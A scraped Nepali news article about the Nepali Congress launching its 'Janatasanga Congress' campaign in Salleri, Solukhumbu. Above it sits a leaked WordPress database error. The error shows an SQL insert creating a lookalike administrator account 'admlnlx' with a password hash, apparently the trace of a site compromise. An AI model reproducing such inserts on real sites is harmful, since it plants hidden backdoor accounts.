WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTeyFOlW3Em8cWC9cM9iL88zj4UZuX1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:11:13', '', 'admlnlx', 'admlnlx')

सोलुखुम्बुमा ‘जनतासँग कांग्रेस’ अभियान शुभारम्भ – Gaule Khabar

सोलुखुम्बुमा ‘जनतासँग कांग्रेस’ अभियान शुभारम्भ

सोलुखुम्बुमा ‘जनतासँग कांग्रेस’ अभियान शुभारम्भ

काठमाण्डौ । नेपाली काँग्रेसले देशब्यापी संचालन गरेको ‘जनतासँग कांग्रेस’ अभियान सोलुखुम्बुमा पनि शुभारम्भ गरेको छ । नेपाली कांग्रेस जिल्ला समितिको आयोजनामा बुधबार सल्लेरीमा आयोजित कार्यक्रमकाबीच केन्द्रीय प्रतिनिधि एवं केन्द्रीय सदस्य कल्पना चौधरीले कार्यक्रमको उद्घाटन गरेकी हुन् ।

जिल्ला सभापति नाम्गेल जाङ्बु शेर्पाको सभापतित्वमा सम्पन्न कार्यक्रममा बोल्ने अधिकांश बक्ताहरुले आसन्न निर्वाचनमा प्रतिनिधिसभा तर्फको टिकट कांग्रेसले पाउनु पर्नेमा जोड दिएका छन् ।

पार्टीका महाधिबेशन प्रतिनिधिहरु, पदाधिकारीहरु, क्षेत्रीय तथा पालिका सभापतिहरु, पार्टीबाट निर्वाचित जनप्रतिनिधिहरु सहभागि कार्यक्रममा बोल्ने अधिकांश बक्ताहरुले जनमतको ख्याल गर्दै गठबन्धनहुँदा कांग्रेसले संघिय सांसदको टिकट पाउनु पर्ने र टिकट पाउँदा पुस्तान्तरणको भावना अनुरुप नयाँ ब्यक्तिलाई दिनु पर्ने बताएका हुन् ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका